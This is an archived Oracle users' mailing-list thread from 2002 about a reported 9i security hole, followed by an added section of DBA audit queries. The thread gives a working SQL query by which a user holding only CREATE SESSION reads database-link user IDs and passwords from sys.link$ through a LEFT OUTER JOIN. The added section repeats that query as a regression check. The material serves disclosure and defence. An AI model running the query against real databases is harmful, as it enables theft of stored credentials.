Oracle FAQ Your Portal to the Oracle Knowledge Grid

Re: 9iDB Security Hole?

From: Jonathan Lewis <jonathan_at_jlcomp.demon.co.uk>
Date: Tue, 16 Apr 2002 00:22:52 +0100
Message-ID: <1018912906.5064.0.nnrp-08.9e984b29@news.demon.co.uk>

Daniel,

As so often happens, you have put your foot in your mouth without reading the post.

Examine the entire script carefully -

    The user selecting from sys.link$ has been created and granted create session AND NO OTHER PRIVILEGE.

--
Jonathan Lewis
http://www.jlcomp.demon.co.uk

Author of:
Practical Oracle 8i: Building Efficient Databases

Next Seminar - Australia - July/August
http://www.jlcomp.demon.co.uk/seminar.html

Host to The Co-Operative Oracle Users' FAQ
http://www.jlcomp.demon.co.uk/faq/ind_faq.html



Daniel Morgan wrote in message <3CBB5EFC.43A50425_at_exesolutions.com>...

>Why ouch? This is known for database links for a long long time. It is not
>present there if you create the link in one of the manners that supports
>security.
>
>And no one other than sys should be looking at sys.link$ anyway. If they are
>you have been granting SELECT ANY TABLE to people without regard to its
>implications. In 9i access, even with SELECT ANY TABLE goes away. And
>hopefully stays that way.
>
>But if I had my preference, which I don't, Oracle would have encrypted it
>back at version 7.x or before. I would be interested in hearing from anyone
>inside of Oracle why this is there. Thanks.
>
>Daniel Morgan
>
>
>Jonathan Lewis wrote:
>
>> Ouch - 9.0.1.3 on HP-UX
>>
>> connect / as sysdba
>> CREATE USER us1 IDENTIFIED BY us11;
>> Grant Create Session To us1;
>>
>> connect us1/us11
>>
>> select a.userid, a.password
>> from sys.link$ a left outer join sys.link$ b on
>> b.name= a.name
>> ;
>>
>> userid password
>> --------- --------------
>> XXX **********
>>
>> --
>> Jonathan Lewis
>> http://www.jlcomp.demon.co.uk
>>
>> Author of:
>> Practical Oracle 8i: Building Efficient Databases
>>
>> Next Seminar - Australia - July/August
>> http://www.jlcomp.demon.co.uk/seminar.html
>>
>> Host to The Co-Operative Oracle Users' FAQ
>> http://www.jlcomp.demon.co.uk/faq/ind_faq.html
>>
>> Vladimir M. Zakharychev wrote in message ...
>> >Anyone with 9i can confirm this?
>> >
>> >
>> >
>> >This effectively means that LEFT OUTER JOIN allows one to create views
>> >on tables that are normally not visible (provided that the unprivileged user
>> >knows table and column names).
>
Received on Mon Apr 15 2002 - 18:22:52 CDT
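An added administrator-side check, not part of the thread or of Oracle's own tooling: queries a DBA can run to inventory which database links keep credentials in sys.link$, who holds SELECT ANY TABLE (the only legitimate route to that table according to Daniel), and whether the bypass shown above still works on the instance. It assumes DBA_DB_LINKS reports 'CURRENT_USER' as the username for current-user links and NULL for connected-user links.

```sql
-- Added example (not from the thread). Steps 1-3 run as a DBA.

-- 1. Database links whose credentials live in the dictionary.
--    Fixed-user links (CONNECT TO user IDENTIFIED BY ...) store a password
--    in sys.link$; connected-user and current-user links do not, which is
--    the "manner that supports security" Daniel refers to.
SELECT owner,
       db_link,
       username,
       host,
       created,
       CASE
         WHEN username IS NULL          THEN 'connected user - no stored password'
         WHEN username = 'CURRENT_USER' THEN 'current user - no stored password'
         ELSE 'fixed user - password stored in sys.link$'
       END AS credential_storage
FROM   dba_db_links
ORDER  BY owner, db_link;

-- 2. Who holds SELECT ANY TABLE, directly or through a role
--    (grantee may be a role; resolve role members separately).
SELECT grantee, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'SELECT ANY TABLE'
ORDER  BY grantee;

-- 3. Confirm SELECT ANY TABLE does not extend to SYS-owned dictionary
--    tables (FALSE is the 9i default and is what Daniel describes).
SELECT name, value
FROM   v$parameter
WHERE  name = 'o7_dictionary_accessibility';

-- 4. Regression check: run the thread's query as a throwaway user that
--    has CREATE SESSION and nothing else (create it as in Jonathan's
--    post). On a build where the issue is fixed this must fail with
--    ORA-00942; any rows returned mean the instance is still exposed.
SELECT a.userid, a.password
FROM   sys.link$ a
       LEFT OUTER JOIN sys.link$ b ON b.name = a.name;
```

Drop the throwaway user once step 4 is done, and treat every link listed as "fixed user" in step 1 as a stored credential that needs the same handling as any other plaintext secret.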
